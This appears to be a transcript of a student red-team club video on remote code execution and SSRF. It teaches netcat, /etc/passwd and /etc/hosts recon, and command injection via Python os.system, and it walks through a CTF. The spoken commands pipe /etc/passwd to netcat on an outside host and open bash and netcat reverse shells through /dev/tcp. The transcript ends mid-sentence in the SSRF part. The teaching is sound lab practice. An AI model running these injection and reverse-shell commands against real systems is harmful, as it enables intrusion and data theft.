Hello everyone, welcome back to OSS Red Team videos. On this one, we are covering the Web Application Security course. This is our second videos for Web App. You still be able to access our Insecure Direct Object Reference videos and also our Burp Suite deep dive videos where we talk about repeater, intruder, and other features in Burp Suite. So please watch those because those are super useful when it comes to testing web app security. For today's videos, we're going to cover remote code execution and server-side request forgery, also known as SSRF, and for remote code execution, it is RCE. Let me start my presentation. So let's get started. Let's ignore this. But however, before we even start our RCE part, it is important for us to review some of the Linux commands. Last week, Brendan taught us some Linux commands that are super useful, as well as he reviewed some of Linux file system, whether it is finding a file or reading some common Linux files like etc password, config files, seeing who the users are and stuff like that. So it is important for us to review that today, because when it comes to RCE, it is important to know what you're looking for, to whenever you have a sell against a company, or if you have an RCE where you're able to execute commands and see those commands, it is important to know the file system or to know what system you are testing. So for example, finding the IP address of the system, listing host file on the system, listing etc password in the system, and things around that. Alright, so now I'm going to start out with first SSH into the server. If you guys remember, the first day of the workshop we gave you guys access to ssh.osscsuf.org, so we're going to do that now, and I want you guys to also do it with me. So if you have your system up, get started and SSH into it. Again, if you have problems with SSH into it, if you're getting publicly denied or some kind of stuff, please let us know, because by now we're expecting everyone to have access. So if you do not have access, please let us know. Otherwise we'll assume everyone has access, and then when it comes to testing stuff or accessing our stuff through SSH, we'll believe everyone has it and will not help in the future. Alright, so please, if you have issues with getting into the server, please let us know. Alright, so now I'm in the SSH system, in this virtual server that is designed for the Red Team members. In future, in spring, we're going to have some tools downloaded and installed on this, so you guys will be able to use it. That's what this whole thing is designed for, as well as understanding Linux file system. So you'll be able to use it when it comes to the big hack day. Let's say if you find a RCE and you want to know what to look for or how to do cell file stuff, you can use this to play around with the Linux environment and try to replicate that on the other environments. Alright, so now I'm in with SSH. So there are a couple of things I want us to review. First of all, it is to see what IP address this system is. So when I initially SSH'd in, all I did was SSH my name at ssh.osscsuf.org, and I was into the system. But what happens after you're in? If you want to know the IP address, how will you do it? Because sometimes there can be firewalls, when you're browsing to front end, so you won't see the IP address. For example, Cloudflare tries to hide the origin IP address, but once you're in the server, once you have a cell, you can easily find that. So we're going to cover a really basic tool called ifconfig. Once I run that, you can see it says I'm using Ethernet in-cap mode, and it gives me the inet address, which is the current IP address of the server. So 144.217.8468 is the IP address of the server. So for example, if I wanted to SSH in without the host name, so let me load this terminal, and if I do SSH rohan at 144.217.84.68, it will automatically add me in because it's the same system, right? So I'm logged in the same system with different ways, with IP address and hostname. So it's super useful to have this IP address because it can be useful when you're running reverse shell or when you're doing scans and stuff like that. So for now, I'm going to exit this. Now the next thing I want us to do is understand some of the file system. So in this one, I want us to cover at least two file systems, which is etc host and etc password. etc host is also available in Windows. So what etc host does is, if you remember, let's say if you are writing a website and you are writing it locally, you can have it go to localhost, which also points to 127.0.0.0.0.1, right? So in Etsy password, you can say 127.0.0.1 can be localhost, or you can also say that if I tell, like for example, you are telling your system, if I'm saying OSS, that means it points to 127.0.0.1. So that's how you'll do these things usually. So for example, if I want to cat Etsy host, you can see that 127 currently means pointed to this IP address instead of localhost. So basically, if I were to tell my website to, I don't think I have any var files running. I do have a flag and stuff, but I don't think this has any port running. But if I were to tell the website to crawl localhost, what this is telling is localhost will now reference this IP, right? So localhost points to that when this system runs a scan on it. And the same thing with VPS. So if I say curl that, it will first request this or this, depending on whichever is accessible at first. This is useful because, for example, if I want to write shortcut keys to websites I'm targeting, so let's say if I go to sudo nano Etsy host, you guys might not be able to edit the Etsy host because usually that's only editable by root. So I recommend you guys try this on your own Linux environment. So for example, if I do this, it will ask me for a password, and once I do that, I tell it, like for example, I want to tell it 7188.19, and I tell it that when I say OSS red team, resolve that to this IP address, right? So I don't have to say ossredteam.com or anything. All I say is OSS red team, resolve it to that, and I hit Control O, save that. So now, for example, if I do cat Etsy host, and I have this saved here, I know that 6670.188.19 has SSH on it, and it's a system that I own. So for example, I can do SSH rohan at OSS red team. So now I don't have to type the whole IP address, and it will tell me it cannot be established. Do you recommend or do you want to continue? I hit yes, and it asks me for a password. So as soon as I do that, I'm in, right? So I'm into a new host, into a new SSH system, and I didn't have to type the whole IP. So all I had to do was OSS red team. So this is another thing that I recommend you guys to learn about, because this can be useful when you are in a system. Let's say you are in a developer system and they have something on Etsy host. For example, let me exit out of this. Let's wait for that. All right. So let's say if I'm a developer and I have an internal IP address, let's say 10.10.10 and blah, right, 89. And this is, let's say, internal analytical or inter-analytical system. Now, if I'm a developer, I can usually just call something like, curl internal analytical system or SSH into internal analytical system, right? So if I do, this is obviously not going to work right now because I do not have anything listening on it. So it's gonna resolve host. Let me make sure internal, it says inter. So as you can see, it tries to connect to it, but that IP currently doesn't exist. So let me cancel that for now. But for example, if you were to check my bash history, so if you get into my server, if you're able to see my bash history for Rohan, you will see that I curled this. But then if you don't know what Etsy host is, you will be like, why is he making a request to a domain that does not exist, right? It's not an IP address, it's not a website. But then if you do know what Etsy host is, you'll be able to look it up and you'll know, oh, he's probably trying to connect to that IP address. And then if you're a red team person, if you're doing a security audit, if you're trying to find more info about the system, you'll know that port is something that they're using internally, or that IP address, and you'll be able to nmap it. So this is another really useful file. We're also going to look at Etsy password. We covered this previously. So for example, in our server, you see that everyone that is registered as a user that has account on our SSH, you can see their names here. So for example, my name is right here, Brendan is here, system perms is a testing environment that I built, and these are all the users. So you can see everyone's name here, and Etsy password is a super useful tool to identify all the users in the system. That way, if you want to SSH in as them and exploit other things, you can get an opportunity out of it. In order to see Etsy password or to understand it more, please check the videos that Brendan uploaded. I know he went really in depth on what each of these things mean. So the names, X, the number, the var files, all of that. He explained all of them. So please watch those videos, check out the presentation we uploaded online, and make sure you understand what those are. Now, I know that was a lot of info, so feel free to take a quick break, stop the video, go eat something, or come back, or watch that part again just so that you understand it, because now we're going to dive into the RCE portion. Next, we did that. We know how to know our system, so we did ifconfig to see our IP address. There's also another way to do it. Let me cover that as well, because why not? So let's say if you have not SSH into the system yet, in this case I'm in my Windows terminal. If I want to see what the IP address of ssh.osscsuf.org is, I'll just do ns lookup osscsuf.org. Not sure why that's not finding it. That's probably some error with Cloudflare, but that should have worked. So let's ignore that for a while. That should have worked. It might have been something with the firewall or something. That's interesting. Let's ignore that for now. There's also another way to know what IP address is something points to. So if you're in Linux, you can run dig command, dig, and a means what IP address. So usually if it's a domain and it's pointing to IP address, it will have it on a record. And if you do ssh.osscsuf.org, you'll be able to see our IP address here. Now, just with this cool tool, A is for a record. When you are receiving email, it is going to be an MX record to tell where to send the emails. Now, I want you guys, while watching this video, go to your Linux terminal and see what we use for emails for osscsuf.org. Not ssh.osscsuf.org, but instead just osscsuf.org. So if you were to email us at redteam@osscsuf.org, how do we get that email? What service do we use? So take about 5 seconds or 10 seconds to see if you can get that. If not, I'm going to explain it in about 3 seconds. So feel free to pause the video and see if you can get the answer. Alright, hopefully you ran the code, hopefully you paused the video. And so for example, to get it, let's jump right into it. Instead of having an A record, I'll do MX. And this one shows is Cloudflare because I'm doing SSH dot. So make sure you do not do that. Now do dig MX of osscsuf, and you'll see that we have all of our MX record pointed to aspmx.google.com. This is basically means we are using Google for all of our email services. So if you were to email us, it's being routed through Google and we're getting it in Gmail lookalike website from Google. So these are super useful tools when you're doing recon on websites. We'll cover recon on Spring, so enumeration and recon will be our Spring topic, but this is the really basic part of it, and I just wanted to cover that because you might need IP addresses sometimes when it comes to using Netcat. Alright, now what's the next slide? We covered this. Alright, internal IP versus external IP addresses. So why do we want to use our ssh.osscsuf.org when doing RCE attacks? Well, to start out with first, if you guys remember, I want you guys to go back during the time when you did Hack the Box about a week ago, right? You guys remember when we ran Metasploit and when we asked you guys what your L host was, it was usually a 10, 10, 10, 12 or 10, 10, 10, 14 or something like that as an IP address. Or if you were if you're trying to run it directly from your system without getting a VPN, it might have been something like 192.168x or something. So for example, if I want to know my internal IP, let me open a new terminal where I'm not SSH into the server. So for example, if I were to go here, and if I do ifconfig, you'll see my internal IP is 192.168.64.128. So all of these are internal IP addresses, not external. And that is super important to know, because what happens is if you're running a remote code execution on a website, so if you're targeting rce.osscsuf.org, and you are running, you are about to create a reverse shell on it. In reverse shell, what you tell the website to do is execute this file, so it might be a bash file or something, and then send it to the listener IP. And if you give a internal IP for that, it will just look for that internal IP in that server. So for example, let's say this is the vulnerable RCE system, right? And you are about to create a, you are about to make it send a request to your 10.10.10 IP address. What it will do instead is it will make a request to its 10.10.10 because it's a local IP. So you'll never get a cell file coming out of it. The only reason in Hack the Box that it worked is because with Hack the Box we are using VPN and we are being a user on that network where all the vulnerable machines are. So that's what I wanted to clarify. If you are doing an RCE on an external website, always use an IP address or a host name in Netcat that is externally accessible. So for example, you'll not be able to use CalStat IP for it. You'll not be able to use your local IP for it. So having access to things like our SSH system helps a lot when you're exploiting an RCE. Alright, so let's get back to the slide. So I explained this part. Now let's go to Netcat. So what is a Netcat? Netcat is a system that allows you to make both TCP and UDP tunneling, so you can intercept and see all your TCP as well as UDP requests. So it kind of helps you to do, use Netcat, because then you can have a server. If the server is responding with UDP, you can still see the request. It's also a super cool tool that allows both. So you can receive requests as well as you can send requests. And we'll be playing around with that in this video. We'll learn how Netcat works, and then we'll check the RCE with Netcat part. So let's get next point. And this point we're going to start how to listen with Netcat. So if you want to see how Netcat listening works, that's what we'll be using on this, because if you are an attacker, you'll be listening, and if you are a victim, you'll be connecting to the listener's port. So for example, to create a listening or to listen on a port, let's say I want to listen on port 8080, I'll do netcat, which is nc tag lv. So what this means is tag L means listen, so listen on a specific port, and tag V means verbose. So that means you can see all the requests you are doing, and it's actually giving you a response in a nice way. And without V, it won't have a clear response. So we'll do something like nclv 8080, and it will say listening on this. So when it says 0000, it means listening on all interfaces. So if it has local IP, it's listening on that. If it has external IP, it's listening on that as well. So in this case, this is SSH system, so we do have an external IP. So for example, our external IP is 144.217.8468. Now from my victim system, right? So Rohan at Ubuntu in this case will be our victim. If I want to do curl to see how if this is working or not, I'll do 144.217.84.68. With when you do a colon, that means you're specifying a specific port, and hit that. And as you can see, we got a hit here, and it says connection from 107. So that's another public IP. That's a public IP for my system. So for example, that's what identifies the service I'm using, the ISP provider I'm using, and stuff like that. I do not have port forwarding, so no one can listen from, or no one can connect to this IP externally. Alright, so in this case, if you notice, I did curl with the HTTP and an IP. But at the same time, what happens is if you're listening here, you're listening on all interfaces, and ssh.osscsuf.org points to this IP. So what you can make it be is like a website, right? So you can do curl HTTP, which is HTTP, you're loading a website, and you'll tell it osscsuf.org port 8080. Once I do it, I'm still getting the hit, and in this time the host you see had changed to what I put on the curl request. Here it was the IP address, in this case is the ssh.oss domain. So as the slide here says, once a port is made, you can also make it be a URL type. So that's your URL. So if you're testing for SSRF, this becomes super useful. You can just give it your URL and you will see what request it's making. Now with Netcat, there is something I want to show you guys. So if you are using your terminal right now, if you are following along with the video, I want you guys to create a listener in SSH that listens to port 80. Alright, so if I do nc tag lv, do port 80. Pause the video, whatever helps you guys to do it, and see what the response is. I'm gonna wait about 3 seconds and then explain it, so feel free to pause the video. Alright, So as you can see, when I ran netcat listen on port 80, it gave me permission denied. And the reason for this is because this is a reserved port. It's a port that's already being used in the system, but the service is down. So for example, in this case, if I do which Apache 2, you'll see that I have Apache 2 installed on my system. Now what this means is, even though I do not have the Apache 2 running, so for example, just so it's not running, I'll do sudo service Apache 2 status. It's flipped. So sudo Apache 2 service status. So let's see if I start it. Right now it's down. Not sure why this is not working. So sudo service Apache 2 start. Should work. There we go. So now Apache 2 is running. So if I do nc listen on port 80, it will say permission denied again because Apache 2 is using it. Not only that, it has reserved it. So the only way, let me stop Apache 2 first. The only way I can potentially run port 80 is by having a sudo privilege. So if I do sudo nc lv port 80, as you can see, now I can listen on port 80. So you have to be a root user to be able to listen as a web app, right? So now if I do curl, I don't have to specify any port for this, because port 80 is a default port for an HTTP website or any website running. As soon as I do that, I'm getting a hit here, and it says on what port did I get the hit, from which IP address, and the hostname that is specified, the user agent. So user agent is super crucial when you're doing RCE. I'll explain more of that when we get to the RCE part. So let's exit this for now and continue our presentation. Now let's learn about how to connect. So in netcat, as I said before, it allows both outbound and inbound, right? So nc lv allowed us to listen, but now with netcat you can also do nc and you specify the IP or the host name and the port, and you are able to connect. So one super cool thing that you can do with netcat is create a 2-user chat channel with netcat. So for example, let's say you and a friend are at class, right? And you are feeling bored or something, you're feeling bored. Let's go with that. And you want to talk with each other. You don't want to check out your phone. It's a CS class. You are using Linux, and you want to talk with each other. You don't want to use Facebook or anything. You can use netcat for that. So for example, on this SSH server, I'll do nc lv and listen to port 8080. So that means I'm listening through on SSH. Now this is my home computer system, so this is a Linux terminal for my Ubuntu. What I'll do is nc and specify the host name, so I don't have to worry about finding the IP address. I can just do nsc.ssh.osscsuf.org and specify port 8080. And you see it says connection established from that IP address at that port. So if I were to say, hi, this class is boring, and you can see it is there. So now I can chat back and say, yeah, right, I hate this, or something. And now you can see that I'm seeing this response. So you can basically create like a chat tunnel. So it's pretty cool, right? It's pretty useful tool. Netcat is really useful. As I said, it allows inbound and outbound, so you can both listen and connect. So that is really useful when it comes to doing RCE, because if a system has netcat, you can just use it to both create a listener on your system and connect from that system's netcat to your listener. So we'll cover that when we talk about RCE and stuff today. So now when I hit Ctrl+C, it closes the connection. So as you can see, it closed here. So it's a cool chat app. See if you can do a chat with a friend. Ask them to go to SSH on here, create your listener, and ask a friend to connect, and see if you guys can talk with each other, right? If you get permission denied or something, let me know and we can look into it. Alright, sending commands. So netcat is not just useful for chatting, obviously, but you can also use it to send a command, a system command from a victim's computer to your listener. So in this case, I'm going to make this terminal right here be an attacker, and this will be a vulnerable machine. So Rohan at Ubuntu is our victim, and Rohan at BPS 219157 is our attacker machine. So in attacker, what will I do, right? What will I do? I'll give you guys, this is a question for you guys. I give you guys 5 seconds, answer it on your own. Feel free to pause the video for that and think, what will I do as an attacker to start the process? I will listen for the port. So I need to listen a specific port. So in this case, NC LVP and a port. So I like 8080, it's simple to use. Let's just go with that. Now this is a victim's computer, and I want to send the etc password of the victim to my attacker IP. So let's go to our slide. Look at the slide here and see if you see the command you have to run, and tell me what point on this does that. So take your time and think about it. Alright, yes, point number 2, that's the one. If you read point number 2, it says go to your Kali terminal, a new terminal, and type whoami pipe netcat, the host name, so that's your attacker host name, and the attacker port. So this is like in case of Metasploit, this is L host, and that's L port. R host is a remote host, R port is a remote port, L host is the listening port or listening host, and L port is a listening port. So what this tells is run whoami, get its result, and send that to this. So for example, now if you're doing etc password, if I want to send my etc password from Rohan at Ubuntu to this system, how will I do it? Take about 5 seconds, 10 seconds, or pause the video and see what you think is the right answer for that. So remember, before I did whoami pipe netcat attacker host attacker port. So what will be the command for this? Alright, so let's start out with reading etc password. You do cat etc password, and that's our etc password, right? Now I want to send that here. So if I were to send whoami, I'll do that. So if I want to send etc password, all I'll do is cat etc password, do this. So I'm piping it, and I say connect to netcat ssh.osscsuf.org and port 8080. Alright, so you can see that's there. So it's telling cat the content and send that here through netcat. So as soon as I hit enter, you'll see that on the attacker machine, now I can see the etc password of my victim. So this is a big hint for RCE. You will be using this on the CTF, so please watch this carefully. This is super useful to have. I will show you guys an example with the team CTF that we did today. The individual CTF will be live after about 2 hours. This video is public to you guys, so make sure to play around with this, right? What I'm teaching here, I might go going fast, but this is the video, so feel free to stop it, slow it down, scroll back, and keep watching it until you get it. So one other way to try it is to do it live, like I'm doing. SSH and a vulnerable machine. Try sending your etc password. Try messaging each other. That's the best way to do these things. Alright? Now, what did you notice? Obviously, you can send commands through netcat. And how can this be useful? It can be super useful when it comes to RCE. Alright, now let's get to what an RCE is. At the start, I said RCE stands for Remote Code Execution. So what that means is, as a user, you are able to remotely execute a command in a server. You're not executing a command in a website, you're executing a command in the server that is hosting that website or that app or that feature or whatever you're attacking. In this workshop, we'll be covering 3 languages, so Python, PHP, and Node.js, and we'll cover the functions that are kind of important for an RCE to occur in these languages. Alright, so let's start out with Python. System and subprocess.call. So these are the 2 functions, or just subprocess at all. If you have system or subprocess anywhere being mentioned in a Python code where it's taking your input and then executing it, is likely going to have an RCE. But just to be clear, just having a system doesn't mean it's vulnerable to RCE, right? It has to take your input, not trust it completely, right? So it doesn't sanitize anything, takes your input and passes it to system. That's where you get the RCE. Subprocess.call is also another one where you pass an array of commands and then you'll execute it. Alright, so I'm going to show you an example. Let's start out with system. So system is an OS command. So in here I'm going to run Python. So if you don't have Python installed on your local system, don't worry about it, because our VPS, our virtual server, also has it. So if you just do Python here, you'll see that it's able to run it. Now you'll do import OS to say you are importing operating system OS module, And to execute a system file or system command, you'll do something like this, right? So this is my system command for my local or the directory I was in right now. So if I want to do something like OSS system cat etc password, you guys will be able to see the etc password of our VPS. Now let's exit out of it. So that's how the system command works. But how does it actually make something vulnerable? So let's check out nano rce.python file, and let me uncomment that and this one. So let's kind of break this down. So if you guys look at the code properly here, I'm importing some libraries: system libraries, request library, and OS library. Then there's a variable called URL from user, and it says system.argument of 1. So system.argument in Python is an array, and 0 stands for the file we called. So if you do system arg0, that means it will say rce.py. But if you do 1, that means whatever the URL I'm passing into the function. And then it calls oss.system curl, right, format URL from user. Okay, so what this is doing is it's passing directly to OSS system the curl command with whatever the user is sending. So it's not sanitizing anything, it's completely trusting the user, and it's running it as a system command. So what I will do now is I'm going to copy this code. Let's do it easily. So copy, let me exit out. So this is our victim system. So throughout this video I'm going to use Rohan at Ubuntu as a victim. So I'm going to do nano rce.py and save it here. Alright, now look at this. So let's clear this, cat rce.py. So let's say this is a function that's on a website. So let's say the function says python rce.py, and then I'm passing my URL. So as a regular user, right, if I'm not malicious, I'll just pass URL. So let me do hacker1.com, and you'll see it's making a request. We'll still be able to see a response soon. That's probably because I didn't cat it. Give me a sec to edit that. That should have worked. So there we go. So now it's printing out us the response, and it says you are being redirected. So hacker1 URL worked. Yeah, that works. Alright, so that's a regular user, but if you read the code nicely, you'll see that I can execute any commands based on what I input. So now what I'm going to do is give it a URL, so let that run, but then I'm going to put a semicolon, which means break away from that command, so it will curl a hacker1.com, and I'm also telling it once you finish curling, do something else. So for example, let's say now I want to send, let's say this is vulnerable, right, to RCE, and let's say I want to send etc password from my system to this. How will I do it? Think about it for a second. Let me put a quotation mark, and I'll explain why I put the quotation mark in a while. Alright, so think about it for a second. How will I send etc password to my attacker machine from my victim? If you forgot, go back to the video and see where we did that, because we did this really recent, like probably 5, 10, 15 minutes ago. So please watch it again. Alright, so to send it, what I'll do is I'll do cat etc password. So I'm telling it to cat the file, meaning output the content, but then pipe that to a netcat to sss.osscsuf.org port 8080 and quotation mark. Now quotation mark is not required when you're testing a website. The only reason I'm passing that in on this one is in Python rce.py file. You know how we are doing sys.argument.1. In system argument, how it parses is everything with spaces is an element in an array. So for example, rce.py will be 0, hacker1.com is 1, cat etc password cat will be 2, etc password will be 3, and so on. But if you check the code, I'm just passing argument 1. So if I put it within a within quotation marks, it's all one argument. Alright, So if I do this, I still have my RCE password on my remote server. Hit that, and as you can see, what it did first, it executed the curl command, and then it also did an output of RCE password to netcat.osscsuf.org port 8080. So let me end that. We are back here. Alright, so that was pretty simple. That's how you'll usually see RCE happen in a terminal. It's super critical again, right? It's super critical to know this small tiny bit of semicolon, which impacts it a lot when it comes to reading RCE password, when it comes to executing separate commands on a system. Alright, so knowing that is super useful. You'll need that, trust me when I say it. Alright, so that was pretty easy with Python. Now let's go with PSP. I won't be able to show the PSP example, but you'll see it in the Team CTF when we do it. So in PSP, there are two execute functions that are super critical: cell execute and execute. These two are both system commands that can be ran to execute an RCE. So let's say if there's a cell execute that's taking your input and parsing it or executing it, that's where you get the RCE. Similar to Python, similar to everything, if it's not taking your user input and if it's executing a hard-coded command, it's not going to be vulnerable. Having cell execute is bad, I understand that, but if it's not taking a user input, you cannot do anything with it. Alright, so it's super important to know it when you're doing source code analysis and you see a company have a cell execute with a hard-coded variable or hard-coded command. Do not tell them they are vulnerable to RCE. Tell them something like, I do not recommend using that. You know, for example, if they are hard coding a call request, just tell them to use a different function. So for example, to show you what I mean, let's go to nano.rce.py. So I'm going to edit this, take that out, and let's say I do not have any URL input, so I just make it do this, right? So if you look at this code, if I'm interviewing you and if I show you this code, do not tell me it's vulnerable to RCE, because if you notice, what I'm doing is I'm hard coding and curling that. I'm not passing any user input, right? So it's super important to understand that. But however, it's still risky to use it, right? It's why are you running a system command when there's something else for it? And what I mean by else is in Python, you have this request module that allows getting websites and parsing their content. So in this case, even when there was RCE, it's recommended to use something like request.get to send a get request, and outputs is txt file or text. So that means make a request and output the response text. So if I do this, run RCE, and this time I don't need to parse any arguments, run it, and you'll see it went to hackerone.com and is outputting the view of that. Alright, so just wanted to cover that part. You know, always make sure you're understanding the code. If there's no user input, there's no RCE. It's bad to use those functions, but there's no RCE. Now eval function in Node.js. So let's check this code out. Now I want you guys to take some time and tell me, or tell it to yourself or to your friend, you know, whoever is helping you with this, if they are, tell them or tell yourself where this code is vulnerable to RCE. So take about a second, 5 seconds, however long it takes you. Feel free to pause the video again, right? This is a video, that's the good part about it, and tell yourself where the vulnerable code is. And you may be right, or if you said 5, line 5, you are right. Line 5 has this function, eval, and what it does, so we're going to break this whole thing down. So let's start from line 1. var express and var app is basically making your Node.js app ready, so it's requiring Express Engine and your app points to that. So this is where your main Node.js web app starts running. So app.get is the route. That means, for example, in this case, let's say if this was a localhost, it'll be localhost / that's where your app.get / means. But then there's a request.query.queue. Request.query means if queue is passed in as a get query parameter, evaluate that and print it out. So it says res, which means resolution, or resolve the request, and send console, or send a reply to the user saying hello and the user query parameter. So if I were to type something like hi or something, it will say hello, hi, or whatever, right? So it's going to evaluate whatever I sent and print it out. With this, the issue is eval is a system call for Node.js. So you can call a system function, so you can import different processes and then evaluate it and make it able to execute etc password or something, so it will print that out. This is a vulnerable web app that's available on GitHub, so if you guys did a reverse lookup on this code, you'll find it, and I recommend you guys download this, run it in your environment, so do not put it in a public environment but in like your local host, and play around with it and see if you can get an RCE. Alright, I'm not going to show how to do it. I want you guys to play it on your own and see if you can get it. Cool? Alright, now let's go to the next part of our presentation. How to test RCE. I have been kind of hinting these things as we go. I previously said something was super important, so I'm going to show it. When it comes to RCE, never just blindly start throwing RCE commands. It's important to know how the system is working. If it is taking your input, analyze what it's doing with the input. If it's just changing your profile, it's likely not going to have an RCE. But if it's going to change your profile, make a request to an external website, or if it's going to change your profile, save something in its local system with your profile name or something, that's likely to have an RCE. If it does anything super weird or interesting, right, if it's making URL requests, if it's making system requests or something, like if it looks like it's doing it, then play around with it. If not, don't throw your, don't start brute forcing RCE commands. Another super important thing to note is if it's making requests through system calls. So an example is if a website takes your input and then curls it or downloads it or pings it, it's likely going to have an RCE, because for that to be done, if it's using the standalone curl request, right? If it's not using a curl or wget that's coming with a library, if it's using that, then it's likely not going to have RCE. But if it's using a standalone version of, like, let's say the system curl, so when you just do curl URL, if it's using that, then it's likely going to have RCE. So for example, if you notice, when I did a request here, let's see if I can go up and show that. Right here, you see when I made a request from my victim account to /ssh.osscscrf.org, right? You see the user agent was curl 7.58.0. That means I'm using the system curl. I'm not using anything like Python request or anything like that, but instead I'm using curl. So it's likely, 99% of the chance it's going to have an RCE. So always, if you see that, play around with it, see if you can bypass if it's using some kind of check. Sometimes an admin might be, or the developer might be used to running curl commands, so they might have regex to prevent it. So you might encounter those situations where even though there's curl, you might not see an RCE, but chances of it are always high. So always play around with it, see if you can get it. And as I said before, knowing this delimiter with a semicolon to break commands is super useful. So if you see this, try to answer it on your own. What is this whole command doing? If I were to paste this in my terminal, what is this doing? So you can run it on your terminal to see what it does, or you can just answer it yourself if you know what this means. Alright, so what who am I semicolon cat etc password is doing is it will execute who am I, and then once it responds whatever the request was for the response of who am I was, it will print it out, and then it's going to cat etc password and show that result. So for example, let's do who am I semicolon cat etc password. You can see here's my etc password. If I go a little bit up, you can see here it printed out my who am I. So it prints that out, and then it realizes there's one more command, so it's breaking it and it's telling run who am I and then run cat etc password. So that's useful when you're testing RCE, because I showed it before with the RCE.py file where I ended the crawl request and began a new request to send the etc password to my netcat. Alright. Now reverse shell. How does reverse shell work? So there are two easy versions of using a reverse shell. Sometimes these may not work completely, so it's always important to have other backups. There are other resources for it, but these are the really easy to use ones. So netcat itself allows you to execute a bin shell file. So what you can do is on your victim server or your victim system, whatever it is, netcat, so write nc your attacker IP or hostname, port, and then tag E to say execute bin shell. So it means execute bin shell and send that or pipe that directly to my netcat in my attacker system in your L host L port. Alright, so let's see if we can do it in mine. I don't know if mine has support for tag E. If not, we won't be able to do it. So let's listen back on port 8080 and do netcat ssh.osscsuf.org port 8080 tag E /bin/sh, and as you can see, I'm getting invalid option. So the reason is most of netcat, the current versions or most versions don't have the tag E option. At that point, you have to write another chain of commands to run a netcat. So in those cases, it's easier to use the second RCE, which is the bash tag I less than sign or greater than sign, however you want to refer that. It could be less than, greater than. Usually I think that's greater than sign, and /dev/tcp. So it says send the bash output right to this TCP. So it creates a new TCP connection to your IP, not your host. Do not give the host name on this. Give your IP, the port, and space 0 and $1 or and1. So let's do a demo of that. So let me copy this so that it's easier for us. Paste it here. Obviously it's not going to work for now because we don't have our IP specified here. So it was 144. Let's see what it was. Let me just do that for now. So if I do ifconfig, no, I don't know, dig a that, and then let's just do with this. So I have it seems like it's hiding my IP address for ssh.osscsuf.org. Oh, I know why. That was the wrong command. So here it is. Right, that's our IP address. I'll copy that, and then here's my bash bin reverse cell, paste the IP there. For port, I specify what port I'm listening with, hit enter, and if you see this now, it actually sends the whole bash shell of Rohan at Ubuntu here. So now I'm Rohan in the Ubuntu system, so I have access to this completely. So if I were to do something like cat etc password, I'm able to output that. I can go to different places so I can see these things, right? So if I want to see what's on Rohan's home directory, do this, and if I go to desktop, you can see I have all my files here. So you can see private key, fake Apache log generator, automation script, and all that things here. So these are pretty useful to have. You know, once you get a reverse listener with bash, especially if you can get the bash one, it's super useful because you also can interact as a bash. You don't have to worry about the cell one because the cell can get complicated sometimes. Alright, so that's the part with RCE. I think that was about it for RCE section. I'm going to actually cover this. So this was the team CTF that we did. So let's get started on that one and see if we can get an RCE on this. Copy that. Let's go to our terminal. Let's open up Firefox. So now we have that open, so give me a second. So now let's paste our link and let's go there. Let's see what this is doing. So now this is like that. I believe if you check the CTF, I told you to go on index.php. So here we are. So it says get the web, get the content of a web page below. So what is this doing? I want to see how this works, right? First thing is we don't know how the feature works, so it's super important to understand how the feature works. Now if you remember, let me exit out of this cell. Alright. If you remember when I initially talked about netcat, I told you that if you open a port, you can also make it be, you know, URL type. So all I have to do now here to see how it works is do http ssh.osscsuf.org port 8080, and let's just do /s or OSS red team because I like using that. I hit submit, And as you see, if you see this clearly, if you can see it clearly, I don't know if you can, it says it's trying to load it. And the reason it's trying to load it is because I haven't closed the connection yet, right? It's requesting a connection, I have not responded with it. So now we know a couple of information, so let me close the connection. We know some information, for example, the user agent. So I want you guys to take about 5 seconds and take a couple of seconds and see if you can get what the user agent did. So read this request right here, the request header, and see if you can get the RC, or not RC, if you can get the user agent. Alright, so now we know in this case the user agent is curl and it's using 7.47.0. Now, as I said before, if it's using a standalone curl like this, it's likely going to have RCE, right? So this is a PSP file, and in RCE.py, if we go back to what we did when we're doing this with cat RCE.py, this is now secure. But before, if you remember, I was trying to get out of the curl, so I closed my request. So I did something like python RCE.py, HTTPS. I'm just going to put anything for now, I don't care. And then I put a semicolon to say stop the curl there and execute something else, right? So in this case, let's say who am I, netcat and the IP and port. So at this time when you're watching this video, this website will be down, but for now, as you watch it, what do you think should be my command? I don't have to necessarily, just a hint, I don't have to necessarily use netcat for this or provide a full URL. So what should be my URL? Take about 5-10 seconds, write a similar Python file and see if you can understand what to do next, because that is super important to know. Alright, hopefully you came up with the result, or you came up with some idea, and let's see if that works. So what will you do is you can pass anything here. I'm going to still pass a real URL and put a semicolon. And if you want to pipe the etc password, who am I, or whatever to netcat, you can do that. So let me show you how to do it as well. So in this case, let's listen on netcat on our SSH back on port 8080. So let's see, I want to see what the user level is. I'll do who am I, pipe that to nc ssh.osscsuf.org and port 8080. Look closely. You'll notice on this one I did not use quotation mark like the Python file, because if you remember, for Python I said the quotation marks are to put the whole argument in one line or one element. In this one it doesn't matter because it's just going to execute it as it is. Alright, so if I hit submit, you'll notice I get 301 moved because it's scoring Google, and then I shall also see that it made a request to my VPS, and you can see the request had who am I, which is www data. So that tells us which user is running this Apache system. Alright, so now let's go back. So now our goal is to get the flag. The flag is in etc password, so all I have to do is cat etc password, pipe it on netcat, and just do this, hit submit, and there it is. So you see there's a flag, user flag free flag 3891. Now there's another way to do it as well. You don't have to pipe it on netcat, as I said, right? Because this is printing out whatever the response is. If you notice, when I did google.com, it printed out whatever the response of Google was. So what happens if I just give it cat etc password and nothing else, URL goes there, hit submit, you'll see it basically cats it and shows us the result. So you didn't necessarily have to netcat it or get a reversal or anything like that. All you had to do was print cat etc password and you had the RCE with it. So that was a pretty simple RCE, right? Hopefully you liked it. There's going to be a similar RCE on the CTF that I'm going to upload, so that will take some time, but hopefully you guys will enjoy it. Alright, so this has been a really long video so far. It's going to be longer because we still have SSRF to cover, but feel free to take a break, pause the video, and let's get back on SSRF now. Alright, SSRF is server-side request forgery. And what that means is you're sending a request from a server, not from your host, to an internal domain and seeing its output. Now, what does that bullet point even mean? If you guys remember, or if you guys did the Tomcat CTF for our CTF.OSS you guys realized that after some time I had to put it behind a firewall. And the reason was people were attacking it. Not people from our red team, but external bots and stuff like that. So if you noticed, only ssh.osscsuf.org could access it. So I made sure the IP block was only allowing that IP address, and only that will be able to make a request. So the question here now is, why does that matter? Well, let's give an example. Let's say OSS is a company, and let's consider the Tomcat to be our internal server, right? And if our company's website at this ssh.osscsuf.org instance is vulnerable to SSRF, what an attacker can do is they can make calls to that environment or that IP address for where the Tomcat or that production environment is, and be able to fetch the data and see it. So that's where SSRF becomes crucial. If you're able to see a response from your server-side request forgery by hitting local IP addresses, you can do a lot of different damages depending on what environment it's running on. Okay? It says right here, if a website sends a request to a domain website that you give, 